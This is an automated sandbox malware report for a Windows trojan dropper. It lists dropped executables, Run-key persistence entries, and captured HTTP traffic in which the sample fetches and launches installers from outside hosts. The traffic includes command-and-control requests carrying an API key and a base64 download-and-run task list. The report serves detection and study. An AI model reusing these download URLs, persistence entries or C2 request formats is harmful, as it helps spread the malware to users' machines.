Sample_315a1eb4a6

by malwarelabrobot on July 2nd, 2017 in Malware Descriptions.

HEUR:Trojan.Win32.Generic (Kaspersky), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 315a1eb4a63efcba76c09cc7ef725666
SHA1: bac5fca266f7ea4647c40d73525298909a941ccb
SHA256: 95cea4afe105f1ccc617f75eed8586727c48aba41fb4b8467f9140738f538967
SSDeep: 6144:8c03xO8yek6ujmsZJqsqfm9WmGVJ7bIBNLbZGrAJj2aCctfaH84:zeMF6r38T/iAJjNaHt
Size: 340480 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: no certificate found
Created at: 2017-06-28 05:18:16
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

AfficheOne.exe:1472
Era5Le.exe:720
Like.exe:2336
%original file name%.exe:3380

The Trojan injects its code into the following process(es):

b5c1hnwf0gs.exe:3696
L37EQRQBZ.exe:3840
%original file name%.exe:3424

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process AfficheOne.exe:1472 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\0mpz3dha0z2\b5c1hnwf0gs.exe (208 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (868 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (868 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\0mpz3dha0z2\b5c1hnwf0gs.exe.config (1 bytes)

The process L37EQRQBZ.exe:3840 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\8E1ZIRJA0X\cast.config (36 bytes)

The process Era5Le.exe:720 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\8E1ZIRJA0X\uninstaller.exe (25488 bytes)
%Program Files%\8E1ZIRJA0X\L37EQRQBZ.exe.config (1 bytes)
%Program Files%\8E1ZIRJA0X\L37EQRQBZ.exe (125291 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (852 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (852 bytes)
%Program Files%\8E1ZIRJA0X\uninstaller.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.new (852 bytes)

The Trojan deletes the following file(s):

C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.720.340440 (0 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.720.340440 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.720.340440 (0 bytes)

The process Like.exe:2336 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (844 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (844 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.new (844 bytes)

The Trojan deletes the following file(s):

C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2336.342827 (0 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2336.342827 (0 bytes)

The process %original file name%.exe:3424 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\BFX6SAZTX6\AfficheOne.exe (400 bytes)
C:\config.conf (62 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\BFX6SAZTX6\Like.exe (232527 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\BFX6SAZTX6\Era5Le.exe (17276 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\BFX6SAZTX6\AfficheOne.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\BFX6SAZTX6\Like.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\BFX6SAZTX6\Era5Le.exe.config (1 bytes)

Registry activity

The process b5c1hnwf0gs.exe:3696 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\DDECache\IExplore\WWW_OpenURL]
"processname" = "iexplore.exe"

"WindowClassName" = "DDEMLMom"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"2niiqjaqkuj" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\0mpz3dha0z2\b5c1hnwf0gs.exe"

The process AfficheOne.exe:1472 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\AfficheOne_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\AfficheOne_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\AfficheOne_RASAPI32]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\AfficheOne_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\AfficheOne_RASMANCS]
"EnableFileTracing" = "0"
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\AfficheOne_RASAPI32]
"EnableConsoleTracing" = "0"
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\AfficheOne_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\AfficheOne_RASAPI32]
"ConsoleTracingMask" = "4294901760"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process L37EQRQBZ.exe:3840 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\L37EQRQBZ_RASMANCS]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\L37EQRQBZ_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\L37EQRQBZ_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\L37EQRQBZ_RASAPI32]
"EnableConsoleTracing" = "0"

"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\L37EQRQBZ_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\L37EQRQBZ_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"5K2HTR1KQOQBJKK" = "%Program Files%\8E1ZIRJA0X\L37EQRQBZ.exe"

The process Era5Le.exe:720 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\Era5Le_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\Era5Le_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\Era5Le_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\Era5Le_RASMANCS]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\Era5Le_RASMANCS]
"EnableConsoleTracing" = "0"
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\Era5Le_RASAPI32]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\Era5Le_RASMANCS]
"FileTracingMask" = "4294901760"
"ConsoleTracingMask" = "4294901760"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process Like.exe:2336 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\Like_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\Like_RASMANCS]
"FileTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\Like_RASAPI32]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\Like_RASMANCS]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\Like_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\Like_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\Like_RASAPI32]
"MaxFileSize" = "1048576"
"EnableFileTracing" = "0"

The process %original file name%.exe:3380 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process %original file name%.exe:3424 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\315a1eb4a63efcba76c09cc7ef725666_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\315a1eb4a63efcba76c09cc7ef725666_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\315a1eb4a63efcba76c09cc7ef725666_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\315a1eb4a63efcba76c09cc7ef725666_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\315a1eb4a63efcba76c09cc7ef725666_RASAPI32]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\315a1eb4a63efcba76c09cc7ef725666_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\315a1eb4a63efcba76c09cc7ef725666_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\315a1eb4a63efcba76c09cc7ef725666_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\315a1eb4a63efcba76c09cc7ef725666_RASAPI32]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\315a1eb4a63efcba76c09cc7ef725666_RASMANCS]
"MaxFileSize" = "1048576"
"EnableConsoleTracing" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"OMEWPRODUCT_8TSGI" = "C:\%original file name%.exe"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

Dropped PE files

MD5 File path
2d30dca9e3464b8b7fc3de9b3d29b22e c:\Program Files\8E1ZIRJA0X\L37EQRQBZ.exe
0e6a9832d083b9764e0346d755c1d746 c:\Program Files\8E1ZIRJA0X\uninstaller.exe
0e94d32f9913e36c636107c915e2d256 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\BFX6SAZTX6\AfficheOne.exe
6c0892a6555528ca1eb71ffd5f3c51c5 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\BFX6SAZTX6\Era5Le.exe
13348096fb9ebb9ea7e9a2af356061c3 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\BFX6SAZTX6\Like.exe
e31b5dc7c12fbb344fdf9e4db1946c45 c:\Users\"%CurrentUserName%"\AppData\Roaming\0mpz3dha0z2\b5c1hnwf0gs.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: H8B74HD%B
Product Name: H8B74HD%
Product Version: 4.8.4.2
Legal Copyright: Copyright (c) 3309
Legal Trademarks:
Original Filename: SanJer66.exe
Internal Name: SanJer66.exe
File Version: 4.8.4.2
File Description: H8
Comments: H8B74HD%B
Language: Russian (Russia)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 8192 334668 334848 4.20161 41d7ea96c8c17445d0138476bd648a2d
.rsrc 344064 4472 4608 3.51241 1308b0ab6ae524d548c4ce2890894c47
.reloc 352256 12 512 0.070639 07d8019462c144b997aeaa315b24db18

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://www.wizzmonetize.com/remotes_xml_sections.php 188.165.209.131
hxxp://lapapahoster.com/from_backup/AdsShow_installer.exe 94.23.199.17
hxxp://lapapahoster.com/download/3/wizzcaster_installer_v2.exe 94.23.199.17
hxxp://lapapahoster.com/get/4/updater.exe 94.23.199.17
hxxp://lapapahoster.com/safe_download/582369/AdsShow.exe 94.23.199.17
hxxp://lapapahoster.com/download/3/wizzcaster_v2.exe 94.23.199.17
hxxp://www.wizzmonetize.com/wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_load 188.165.209.131
hxxp://www.wizzmonetize.com/wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_notok 188.165.209.131
hxxp://lapapahoster.com/download/3/wizzcaster_uninstaller_v2.exe 94.23.199.17
hxxp://www.wizzmonetize.com/api/v5/config 188.165.209.131
hxxp://www.wizzmonetize.com/api/v5/link 188.165.209.131
hxxp://wizzcaster.com/api/v5/config 188.165.210.24
hxxp://agent.wizztrakys.com/wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_notok 94.23.44.92
hxxp://agent.wizztrakys.com/wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_load 94.23.44.92
hxxp://wizzcaster.com/api/v5/link 188.165.210.24


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download HTTP

Traffic

POST /api/v5/config HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: wizzcaster.com
Content-Length: 38
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....




uid=57a764d042bf8&days_after_install=0

HTTP/1.1 200 OK


Date: Sat, 01 Jul 2017 10:27:40 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Set-Cookie: laravel_session=c65ff0effae7e78d46a71dad930654be8e478ee2; expires=Sat, 01-Jul-2017 12:27:40 GMT; Max-Age=7200; path=/; httponly
Content-Length: 28
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
{"time_between_prints":"15"}HTTP/1.1 200 OK..Date: Sat, 01 Jul 2017 10
:27:40 GMT..Server: Apache/2.4.10 (Debian)..Cache-Control: no-cache..S
et-Cookie: laravel_session=c65ff0effae7e78d46a71dad930654be8e478ee2; e
xpires=Sat, 01-Jul-2017 12:27:40 GMT; Max-Age=7200; path=/; httponly..
Content-Length: 28..Keep-Alive: timeout=10, max=100..Connection: Keep-
Alive..Content-Type: text/html; charset=UTF-8..{"time_between_prints":
"15"}....


POST /api/v5/link HTTP/1.1


Content-Type: application/x-www-form-urlencoded
Host: wizzcaster.com
Content-Length: 17
Expect: 100-continue


HTTP/1.1 100 Continue
....




uid=57a764d042bf8

HTTP/1.1 200 OK


Date: Sat, 01 Jul 2017 10:27:40 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Set-Cookie: laravel_session=1d223159165453ae5edea2aca148af763b4fda5a; expires=Sat, 01-Jul-2017 12:27:40 GMT; Max-Age=7200; path=/; httponly
Content-Length: 62
Content-Type: text/html; charset=UTF-8
{"link":"http:\/\/bigpicturepop.com\/redirect\/57a764d042bf8"}HTTP/1.1
 200 OK..Date: Sat, 01 Jul 2017 10:27:40 GMT..Server: Apache/2.4.10 (D
ebian)..Cache-Control: no-cache..Set-Cookie: laravel_session=1d2231591
65453ae5edea2aca148af763b4fda5a; expires=Sat, 01-Jul-2017 12:27:40 GMT
; Max-Age=7200; path=/; httponly..Content-Length: 62..Content-Type: te
xt/html; charset=UTF-8....



GET /download/3/wizzcaster_v2.exe HTTP/1.1
Host: lapapahoster.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 10:27:39 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzcaster_v2.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
fe000..MZ......................@......................................
.........!..L.!This program cannot be run in DOS mode....$.......PE..L
....aWY.........."...0.............n.... ........@.. .................
......@............@.....................................O.......P....
................ .....................................................
.. ............... ..H............text...t.... ...................... 
..`.rsrc...P...........................@..@.reloc....... .............
.........@..B................P.......H........#...............4.......
........................................0..Y........r...p(......~....o
............o......r[..po.......$....o......rk..po..... .....$....o...
...r...po.......%....o......r...po.......&....o......r...po.....(.....
(....o......)...%..,.o......(.....o......r...po.....(.....(....o......
)...%..,.o......(.....o......r...p~....o.............o....t.......o...
...o ...(!.....(............io"...o...... ...*....0..)........(......s
#.....o$.....o%.....o&...... ..*....0...........('.....r...po(.... ..*
".()....*^..}.....(*......(.....*.0..n.........(......)...%.._.o......
..... ....(....(......( .....o,...r...po......o-...t.............%...o
....&.........*..........fg.......0.. .........,..{....... ....,...{..
..o........(/....*...s0...}......(1.....r...po2....*&..(.....*&.()....
.*....0..9........~.........,".r...p.....(3...o4...s5...........~.....
 ..*....0...........~..... ..*".......*.0...........~..... ..*".(6....
*Vs....(7...t.........*..BSJB............v2.0.50727......l.......#
<<< skipped >>>

GET /download/3/wizzcaster_uninstaller_v2.exe HTTP/1.1


Host: lapapahoster.com


HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 10:27:40 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzcaster_uninstaller_v2.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
4dc00..MZ......................@......................................
.........!..L.!This program cannot be run in DOS mode....$.......PE..L
....aWY.........."...0.................. ........@.. .................
......@............@.....................................O.......|....
................ ......L..............................................
.. ............... ..H............text........ ...................... 
..`.rsrc...|...........................@..@.reloc....... .............
.........@..B........................H........#...............4..`....
........................................0..Y........r...p(......~....o
............o......r[..po.......$....o......rk..po..... .....$....o...
...r...po.......%....o......r...po.......&....o......r...po.....(.....
(....o......)...%..,.o......(.....o......r...po.....(.....(....o......
)...%..,.o......(.....o......r...p~....o.............o....t.......o...
...o ...(!.....(............io"...o...... ...*....0..)........(......s
#.....o$.....o%.....o&...... ..*....0...........('.....r...po(.... ..*
".()....*^..}.....(*......(.....*.0..n.........(......)...%.._.o......
..... ....(....(......( .....o,...r...po......o-...t.............%...o
....&.........*..........fg.......0.. .........,..{....... ....,...{..
..o........(/....*...s0...}......(1.....r...po2....*&..(.....*&.()....
.*....0..9........~.........,".r...p.....(3...o4...s5...........~.....
 ..*....0...........~..... ..*".......*.0...........~..... ..*".(6....
*Vs....(7...t.........*..BSJB............v2.0.50727......l.......#
<<< skipped >>>


GET /from_backup/AdsShow_installer.exe HTTP/1.1
Host: lapapahoster.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 10:27:35 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="AdsShow_installer.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
2800..MZ......................@.......................................
........!..L.!This program cannot be run in DOS mode....$.......PE..L.
....VY.........."...0..............;... ...@....@.. ..................
..................@.................................l;..O....@..@.....
...............`......4:..............................................
. ............... ..H............text........ ...................... .
.`.rsrc...@....@......................@..@.reloc.......`.......&......
........@..B.................;......H........"..............|9........
.......................................0............(....(....r...pr..
.po....(....%(....&(....r...pr...po....r...p(....(....... $. ....3... 
.. ....&&..X.. ....2...X.. ....2.s....r...ps.....o......(......&..*...
.................0..>.......(...........%.r...p.%.r...p.%.r...p.%.r
_..p.%.r...p.%.r...p.%.r...p.%.r...p.%.rw..p.%..r...p.%..r...p.%..r\..
p.%..r...p.%..r...p.%..rc..p.%..r...p.%..r...p.%..r...p.%..r...p.%..r)
..p.%..rC..p.%..ra..p.%..r...p.%..r...p.%..r...p.%..r1..p.(....... .. 
....3.........X.. ....2..rS..p(.....(......,.....(....&*.r...p(....&*.
.( ...*.~....-.rc..p.....(!...o"...s#........~....*.~....*.......*.~..
..*..($...*Vs....(%...t.........*..BSJB............v2.0.50727......l..
.(...#~......(...#Strings............#US.`.......#GUID...p...L...#Blob
...........W..........3........'...................%..................
.............................K. ..... .........{.......q.....q.....q..
...q...k.q.....q.....q.........=.......q.....%.....%.....%...K....
<<< skipped >>>

GET /download/3/wizzcaster_installer_v2.exe HTTP/1.1


Host: lapapahoster.com


HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 10:27:35 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzcaster_installer_v2.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
54e00..MZ......................@......................................
.........!..L.!This program cannot be run in DOS mode....$.......PE..L
....aWY.........."...0..8...........W... ...`....@.. .................
...................@.................................\W..O....`..|....
.......................$V.............................................
.. ............... ..H............text....7... ...8.................. 
..`.rsrc...|....`.......:..............@..@.reloc...............L.....
.........@..B.................W......H........#...............4..8!...
........................................0..Y........r...p(......~....o
............o......r[..po.......$....o......rk..po..... .....$....o...
...r...po.......%....o......r...po.......&....o......r...po.....(.....
(....o......)...%..,.o......(.....o......r...po.....(.....(....o......
)...%..,.o......(.....o......r...p~....o.............o....t.......o...
...o ...(!.....(............io"...o...... ...*....0..)........(......s
#.....o$.....o%.....o&...... ..*....0...........('.....r...po(.... ..*
".()....*^..}.....(*......(.....*.0..n.........(......)...%.._.o......
..... ....(....(......( .....o,...r...po......o-...t.............%...o
....&.........*..........fg.......0.. .........,..{....... ....,...{..
..o........(/....*...s0...}......(1.....r...po2....*&..(.....*&.()....
.*....0..9........~.........,".r...p.....(3...o4...s5...........~.....
 ..*....0...........~..... ..*".......*.0...........~..... ..*".(6....
*Vs....(7...t.........*..BSJB............v2.0.50727......l.......#
<<< skipped >>>

GET /get/4/updater.exe HTTP/1.1


Host: lapapahoster.com


HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 10:27:35 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="updater.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
211a00..MZ......................@.....................................
..........!..L.!This program cannot be run in DOS mode....$.......PE..
L....aWY.........."...0...!.........V"!.. ...@!...@.. ................
........!...........@.................................."!.O....@!.|...
.................`!...... !...........................................
... ............... ..H............text...\.!.. ....!.................
 ..`.rsrc...|....@!.......!.............@..@.reloc.......`!.......!...
..........@..B................8"!.....H........#...............4.... .
.........................................0..Y........r...p(......~....
o............o......r[..po.......$....o......rk..po..... .....$....o..
....r...po.......%....o......r...po.......&....o......r...po.....(....
.(....o......)...%..,.o......(.....o......r...po.....(.....(....o.....
.)...%..,.o......(.....o......r...p~....o.............o....t.......o..
....o ...(!.....(............io"...o...... ...*....0..)........(......
s#.....o$.....o%.....o&...... ..*....0...........('.....r...po(.... ..
*".()....*^..}.....(*......(.....*.0..n.........(......)...%.._.o.....
...... ....(....(......( .....o,...r...po......o-...t.............%...
o....&.........*..........fg.......0.. .........,..{....... ....,...{.
...o........(/....*...s0...}......(1.....r...po2....*&..(.....*&.()...
..*....0..9........~.........,".r...p.....(3...o4...s5...........~....
. ..*....0...........~..... ..*".......*.0...........~..... ..*".(6...
.*Vs....(7...t.........*..BSJB............v2.0.50727......l.......
<<< skipped >>>


POST /remotes_xml_sections.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: VVV.wizzmonetize.com
Content-Length: 169
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....




remote_id=1&user_name=wemonetize&api_key=e721cfcc-2148-11e6-922f-0cc47
a47968c&buying_product_name=DefaultProduct&buying_partner_name=Default
Partner&buying_channel_name=1

HTTP/1.1 200 OK


Date: Sat, 01 Jul 2017 10:27:32 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=hrlss9h6bbv8oma9v0bdakv8d0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1644
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
PHVwZGF0ZXMgcmVmcmVzaD0iMTgwIj4KCjx0YXNrPg0KDQo8cGVyZm9ybT4NCg0KPGRvd2
5sb2FkIG5hbWU9IkFmZmljaGVPbmUiIHZhbHVlPSJodHRwOi8vbGFwYXBhaG9zdGVyLmNv
bS9mcm9tX2JhY2t1cC9BZHNTaG93X2luc3RhbGxlci5leGUiIHZlcnNpb249IiIgIHNvZn
R3YXJlPSIiIG5ldD0ieWVzIiAvPg0KPHByb2Nlc3MgdHlwZT0ic3RhcnQiIG5hbWU9IkFm
ZmljaGVPbmUiIHZhbHVlPSJub3R3YWl0IiBwYXJhbXM9Im5pbXBvcnRlIi8 DQo8bW9kIH
R5cGU9ImFkZCIgbmFtZT0iQWZmaWNoZU9uZSIgdmFsdWU9IjVlZTE3MDcwMSIvPg0KDQo8
L3BlcmZvcm0 DQoNCjxjb25kaXRpb25zPg0KDQo8bW9kIHR5cGU9ImNoZWNrIiBuYW1lPS
JBZmZpY2hlT25lIiB2YWx1ZT0iOTUxNzA3MDEiIG1hdGNoPSJmYWxzZSIvPg0KDQo8L2Nv
bmRpdGlvbnM DQo8L3Rhc2s PHRhc2s DQoNCjxwZXJmb3JtPg0KDQo8ZG93bmxvYWQgbm
FtZT0iRXJhNUxlIiB2YWx1ZT0iaHR0cDovL2xhcGFwYWhvc3Rlci5jb20vZG93bmxvYWQv
My93aXp6Y2FzdGVyX2luc3RhbGxlcl92Mi5leGUiIHZlcnNpb249IiIgIHNvZnR3YXJlPS
IiIG5ldD0ieWVzIiAvPg0KPHByb2Nlc3MgdHlwZT0ic3RhcnQiIG5hbWU9IkVyYTVMZSIg
dmFsdWU9Im5vdHdhaXQiIHBhcmFtcz0iNTdhNzY0ZDA0MmJmOCIvPg0KPG1vZCB0eXBlPS
JhZGQiIG5hbWU9IkVyYTVMZSIgdmFsdWU9IjF0dDE3MDcwMSIvPg0KDQo8L3BlcmZvcm0 
